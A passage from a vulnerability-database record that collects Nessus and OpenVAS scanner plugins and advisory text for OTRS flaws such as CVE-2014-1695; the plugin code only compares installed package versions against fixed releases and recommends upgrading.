- Fixed bug#10158 - Missing quoting in\n State::StateGetStatesByType().\n\n - Fixed bug#8969 - FAQ module Language files installation\n fails (Kernel/Language permissions).\n\n - Fixed bug#9959 - & breaks ExpandCustomerName.\n\n - Fixed bug#10099 - Missing challenge token checks on\n customer interface.\n\n - Fixed bug#10103 - ArticleTypeID is always undef in\n AgentTicketCompose.\n\n - Added 
functionality to disable access to tickets of\n other customers with the same customer company in\n customer interface.\n\n - Fixed bug#9650 - Special character in customer id breaks\n Open Tickets in AgentTicketZoom.\n\n - Fixed bug#9723 - TicketAccountedTime stat does not run\n on Oracle with many tickets\n\n - Fixed bug#10077 - regular expressions in postmaster\n filter return 1 if no regex match.\n\n - Fixed bug#10070 - Wrong error message if Transition\n contains no transition actions.", "edition": 20, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : otrs (openSUSE-SU-2014:0360-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1695"], "modified": "2014-06-13T00:00:00", "cpe": ["cpe:/o:novell:opensuse:12.3", "p-cpe:/a:novell:opensuse:otrs-itsm", "p-cpe:/a:novell:opensuse:otrs", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-202.NASL", "href": "https://www.tenable.com/plugins/nessus/75286", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-202.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75286);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-1695\");\n script_bugtraq_id(65844);\n\n script_name(english:\"openSUSE Security Update : otrs (openSUSE-SU-2014:0360-1)\");\n script_summary(english:\"Check for the openSUSE-2014-202 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The OTRS ticket system was updated to 3.1.20 / 3.2.15 :\n\nOn openSUSE 12.3 it was updated to 3.1.20: (fix for 
OSA-2014-03,\nCVE-2014-1695)\n\n - Improved HTML filter.\n\n - 3.1.19 2014-01-28\n\n - Fixed bug#10158 - Missing quoting in\n State::StateGetStatesByType().\n\n - Fixed bug#10099 - Missing challenge token checks on\n customer interface.\n\n - Fixed bug#8489 - setting Tickets per page resets\n AgentTicketQueue.\n\n - Fixed bug#9661 - Useless code in DynamicField backend.\n\n - Fixed bug#9622 - Actions in Small ticket overview don't\n work when cookies are turned off.\n\n - Fixed bug#9541 - Package manager cannot use https proxy.\n\n - Fixed bug#9594 - No auto-reply sent with multiple From\n addresses in AgentTicketPhone on PostgreSQL and Oracle.\n\n - Fixed bug#3434 - Validity of search time frame not\n checked by OTRS.\n\n - Fixed bug#9596 - On merge and bounce screens is\n confusing when fill or not 'To', 'Subject' and 'Body'\n fields.\n\n - Fixed bug#9595 - Incomplete page reload handling in\n merge and bounce.\n\n - Fixed bug#3007 - CheckMXRecord and CheckEmailAddresses\n have no effect on AgentTicketBounce.\n\n - Fixed bug#9512 - Database error for invalid date in\n AgentTicketSearch.\n\n - Fixed bug#8835 - No article found for TicketID <TICKET\n ID> when showing group tickets\n\n - Fixed bug#9583 - Dynamic Fields of type Date have\n timestamp in notifications.\n\n - Fixed bug#9579 - SOAP Serializer used in\n Kernel/GenericInterface/Transport/ HTTP/SOAP.pm does not\n correctly set namespace.\n\n - Fixed bug#7359 - Setting pending states via generic\n agent does not set pending time.\n\n - Fixed bug#8380 - Middle name not displayed in\n AdminCustomerUser.\n\n - Fixed bug#9576 - GI TicketSearch Date and Date/Time\n dynamic fields are ignored.\n\n - Changed Dynamic Field SearchFieldParameterBuild() API,\n LayoutObject is now optional.\n\n - Fixed bug#9573 - Date and DateTime dynamic fields not\n considered in GenericAgent Jobs.\n\nOn openSUSE 13.1 it was updated to 3.2.15: (fix for OSA-2014-03,\nCVE-2014-1695)\n\n - Improved HTML filter.\n\n - Fixed bug#10207 - 
DynamicField Search-Function in\n CustomerFrontend is not working.\n\n - Followup for bug#9011 - New value after value mapping\n can't be 0.\n\n - Fixed bug#10214 - Value '0' for DynamicsFields prevents\n TicketCreation.\n\n - Fixed bug#9616 - Too long activities and transitions are\n not displayed correctly.\n\n - Fixed bug#10212 - My tickets & Company tickets in 3.3.4.\n\n - Fixed bug#10205 - GenericInterface: Mandatory TimeUnits\n can't be 0.\n\n - Fixed bug#10196 - Ticket merge action does not notify\n the owner of the existing ticket.\n\n - Fixed bug#9692 - On PhoneOutbound articles, the FROM\n field shows Customer ID instead Agent ID.\n\n - Fixed bug#10189 - ProcessManagement: Use article subject\n if no ticket title is set.\n\n - Fixed bug#9654 - TicketUpdate operation doesn't work\n when authenticated as a customer.\n\n - Fixed bug#10137 - Generic interface TicketCreate\n operation doesn't work when authenticated as a customer.\n\n - 3.2.14\n\n - Fixed bug#10172 - Can't create process tickets with\n disabled richtext.\n\n - Fixed bug#10121 - QQMails break in OTRS.\n\n - Fixed bug#10158 - Missing quoting in\n State::StateGetStatesByType().\n\n - Fixed bug#8969 - FAQ module Language files installation\n fails (Kernel/Language permissions).\n\n - Fixed bug#9959 - & breaks ExpandCustomerName.\n\n - Fixed bug#10099 - Missing challenge token checks on\n customer interface.\n\n - Fixed bug#10103 - ArticleTypeID is always undef in\n AgentTicketCompose.\n\n - Added functionality to disable access to tickets of\n other customers with the same customer company in\n customer interface.\n\n - Fixed bug#9650 - Special character in customer id breaks\n Open Tickets in AgentTicketZoom.\n\n - Fixed bug#9723 - TicketAccountedTime stat does not run\n on Oracle with many tickets\n\n - Fixed bug#10077 - regular expressions in postmaster\n filter return 1 if no regex match.\n\n - Fixed bug#10070 - Wrong error message if Transition\n contains no transition actions.\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=866476\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-03/msg00030.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected otrs packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:otrs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:otrs-itsm\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"otrs-3.1.20-26.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"otrs-itsm-3.1.10-26.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"otrs-3.2.15-31.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"otrs-itsm-3.2.9-31.5.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"otrs\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-07T11:54:34", "description": "Updated otrs package fixes security vulnerability :\n\nAn attacker could send a specially prepared HTML email to OTRS. 
If he\ncan then trick an agent into following a special link to display this\nemail, JavaScript code would be executed (CVE-2014-1695).", "edition": 25, "published": "2014-03-14T00:00:00", "title": "Mandriva Linux Security Advisory : otrs (MDVSA-2014:054)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1695"], "modified": "2014-03-14T00:00:00", "cpe": ["cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:otrs"], "id": "MANDRIVA_MDVSA-2014-054.NASL", "href": "https://www.tenable.com/plugins/nessus/73001", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:054. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73001);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-1695\");\n script_bugtraq_id(65844);\n script_xref(name:\"MDVSA\", value:\"2014:054\");\n\n script_name(english:\"Mandriva Linux Security Advisory : otrs (MDVSA-2014:054)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandriva Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated otrs package fixes security vulnerability :\n\nAn attacker could send a specially prepared HTML email to OTRS. 
If he\ncan then trick an agent into following a special link to display this\nemail, JavaScript code would be executed (CVE-2014-1695).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0114.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected otrs package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:otrs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"otrs-3.2.15-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-12T09:38:42", "description": "An attacker who is logged into OTRS, a Ticket Request System, as an\nagent with write permissions for statistics can inject arbitrary code\ninto the system. This can lead to serious problems like privilege\nescalation, data loss, and denial of service. This issue is also known\nas CVE-2017-14635 and is resolved by upgrading to the latest upstream\nrelease of OTRS3.\n\n****IMPORTANT UPGRADE NOTES**** ===============================\n\nThis update requires manual intervention. We strongly recommend to\nbackup all files and databases before upgrading. 
If you use the MySQL\nbackend you should read Debian bug report #707075 and the included\nREADME.Debian file which will provide further information.\n\nIf you discover that the maintenance mode is still activated after the\nupdate, we recommend to remove /etc/otrs/maintenance.html and\n/var/lib/otrs/httpd/htdocs/maintenance.html which will resolve the\nissue .\n\nIn addition the following security vulnerabilities were also \naddressed :\n\nCVE-2014-1695 Cross-site scripting (XSS) vulnerability in OTRS allows\nremote attackers to inject arbitrary web script or HTML via a crafted\nHTML email\n\nCVE-2014-2553 Cross-site scripting (XSS) vulnerability in OTRS allows\nremote authenticated users to inject arbitrary web script or HTML via\nvectors related to dynamic fields\n\nCVE-2014-2554 OTRS allows remote attackers to conduct clickjacking\nattacks via an IFRAME element\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n3.3.18-1~deb7u1.\n\nWe recommend that you upgrade your otrs2 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 18, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-10-02T00:00:00", "title": "Debian DLA-1119-1 : otrs2 security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-2554", "CVE-2014-1695", "CVE-2017-14635", "CVE-2014-2553"], "modified": "2017-10-02T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:otrs2", "p-cpe:/a:debian:debian_linux:otrs", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-1119.NASL", "href": "https://www.tenable.com/plugins/nessus/103577", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1119-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103577);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-1695\", \"CVE-2014-2553\", \"CVE-2014-2554\", \"CVE-2017-14635\");\n script_bugtraq_id(65844, 66567, 66569);\n\n script_name(english:\"Debian DLA-1119-1 : otrs2 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An attacker who is logged into OTRS, a Ticket Request System, as an\nagent with write permissions for statistics can inject arbitrary code\ninto the system. This can lead to serious problems like privilege\nescalation, data loss, and denial of service. 
This issue is also known\nas CVE-2017-14635 and is resolved by upgrading to the latest upstream\nrelease of OTRS3.\n\n****IMPORTANT UPGRADE NOTES**** ===============================\n\nThis update requires manual intervention. We strongly recommend to\nbackup all files and databases before upgrading. If you use the MySQL\nbackend you should read Debian bug report #707075 and the included\nREADME.Debian file which will provide further information.\n\nIf you discover that the maintenance mode is still activated after the\nupdate, we recommend to remove /etc/otrs/maintenance.html and\n/var/lib/otrs/httpd/htdocs/maintenance.html which will resolve the\nissue .\n\nIn addition the following security vulnerabilities were also \naddressed :\n\nCVE-2014-1695 Cross-site scripting (XSS) vulnerability in OTRS allows\nremote attackers to inject arbitrary web script or HTML via a crafted\nHTML email\n\nCVE-2014-2553 Cross-site scripting (XSS) vulnerability in OTRS allows\nremote authenticated users to inject arbitrary web script or HTML via\nvectors related to dynamic fields\n\nCVE-2014-2554 OTRS allows remote attackers to conduct clickjacking\nattacks via an IFRAME element\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n3.3.18-1~deb7u1.\n\nWe recommend that you upgrade your otrs2 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/09/msg00036.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/otrs2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected otrs, and otrs2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:otrs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:otrs2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"otrs\", reference:\"3.3.18-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"otrs2\", reference:\"3.3.18-1~deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:37:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1695"], "description": "This host is running OTRS (Open Ticket Request System) and is prone to html\ninjection vulnerability.", "modified": "2018-10-12T00:00:00", "published": "2014-03-04T00:00:00", "id": "OPENVAS:1361412562310804243", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804243", "type": "openvas", "title": "OTRS Email HTML Injection Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_otrs_email_html_inj_vuln.nasl 11867 2018-10-12 10:48:11Z cfischer $\n#\n# OTRS Email HTML Injection Vulnerability\n#\n# Authors:\n# Shashi Kiran N <nskiran@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General 
Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nCPE = \"cpe:/a:otrs:otrs\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804243\");\n script_version(\"$Revision: 11867 $\");\n script_cve_id(\"CVE-2014-1695\");\n script_bugtraq_id(65844);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:48:11 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-04 17:31:09 +0530 (Tue, 04 Mar 2014)\");\n script_name(\"OTRS Email HTML Injection Vulnerability\");\n\n\n script_tag(name:\"summary\", value:\"This host is running OTRS (Open Ticket Request System) and is prone to html\ninjection vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"An error exists in OTRS core system which fails to properly sanitize\nuser-supplied input before using it in dynamically generated content\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to steal the victim's\ncookie-based authentication credentials.\");\n script_tag(name:\"affected\", value:\"Open Ticket Request System (OTRS) version 3.1.x before 3.1.20, 3.2.x 
before 3.2.15,\nand 3.3.x before 3.3.5\");\n script_tag(name:\"solution\", value:\"Upgrade to OTRS version 3.1.20 or 3.2.15 or 3.3.5 or later.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/57018\");\n script_xref(name:\"URL\", value:\"https://www.otrs.com/security-advisory-2014-03-xss-issue\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"secpod_otrs_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"OTRS/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.otrs.com\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\n\nif(!otrsport = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(vers = get_app_version(cpe:CPE, port:otrsport))\n{\n if(version_in_range(version:vers, test_version:\"3.1.0\", test_version2:\"3.1.19\") ||\n version_in_range(version:vers, test_version:\"3.2.0\", test_version2:\"3.2.14\") ||\n version_in_range(version:vers, test_version:\"3.3.0\", test_version2:\"3.3.4\"))\n {\n security_message(port:otrsport);\n exit(0);\n }\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-01-29T20:09:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-2554", "CVE-2014-1695", "CVE-2017-14635", "CVE-2014-2553"], "description": "An attacker who is logged into OTRS, a Ticket Request System, as an\nagent with write permissions for statistics can inject arbitrary code\ninto the system. This can lead to serious problems like privilege\nescalation, data loss, and denial of service. This issue is also known\nas CVE-2017-14635 and is resolved by upgrading to the latest upstream\nrelease of OTRS3.\n\n****IMPORTANT UPGRADE NOTES****\n===============================\n\nThis update requires manual intervention. 
We strongly recommend to\nbackup all files and databases before upgrading. If you use the MySQL\nbackend you should read Debian bug report #707075 and the included\nREADME.Debian file which will provide further information.\n\nIf you discover that the maintenance mode is still activated after the\nupdate, we recommend to remove /etc/otrs/maintenance.html and\n/var/lib/otrs/httpd/htdocs/maintenance.html which will resolve the issue\n.\n\nIn addition the following security vulnerabilities were also addressed:\n\nCVE-2014-1695\nCross-site scripting (XSS) vulnerability in OTRS allows remote\nattackers to inject arbitrary web script or HTML via a crafted HTML\nemail\n\nCVE-2014-2553\nCross-site scripting (XSS) vulnerability in OTRS allows remote\nauthenticated users to inject arbitrary web script or HTML via\nvectors related to dynamic fields\n\nCVE-2014-2554\nOTRS allows remote attackers to conduct clickjacking attacks via an\nIFRAME element", "modified": "2020-01-29T00:00:00", "published": "2018-02-07T00:00:00", "id": "OPENVAS:1361412562310891119", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891119", "type": "openvas", "title": "Debian LTS: Security Advisory for otrs2 (DLA-1119-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891119\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2014-1695\", \"CVE-2014-2553\", \"CVE-2014-2554\", \"CVE-2017-14635\");\n script_name(\"Debian LTS: Security Advisory for otrs2 (DLA-1119-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-02-07 00:00:00 +0100 (Wed, 07 Feb 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2017/09/msg00036.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"otrs2 on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n3.3.18-1~deb7u1.\n\nWe recommend that you upgrade your otrs2 packages.\");\n\n script_tag(name:\"summary\", value:\"n attacker who is logged into OTRS, a Ticket Request System, as an\nagent with write permissions for statistics can inject arbitrary code\ninto the system. This can lead to serious problems like privilege\nescalation, data loss, and denial of service. 
This issue is also known\nas CVE-2017-14635 and is resolved by upgrading to the latest upstream\nrelease of OTRS3.\n\n****IMPORTANT UPGRADE NOTES****\n===============================\n\nThis update requires manual intervention. We strongly recommend to\nbackup all files and databases before upgrading. If you use the MySQL\nbackend you should read Debian bug report #707075 and the included\nREADME.Debian file which will provide further information.\n\nIf you discover that the maintenance mode is still activated after the\nupdate, we recommend to remove /etc/otrs/maintenance.html and\n/var/lib/otrs/httpd/htdocs/maintenance.html which will resolve the issue\n.\n\nIn addition the following security vulnerabilities were also addressed:\n\nCVE-2014-1695\nCross-site scripting (XSS) vulnerability in OTRS allows remote\nattackers to inject arbitrary web script or HTML via a crafted HTML\nemail\n\nCVE-2014-2553\nCross-site scripting (XSS) vulnerability in OTRS allows remote\nauthenticated users to inject arbitrary web script or HTML via\nvectors related to dynamic fields\n\nCVE-2014-2554\nOTRS allows remote attackers to conduct clickjacking attacks via an\nIFRAME element\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"otrs\", 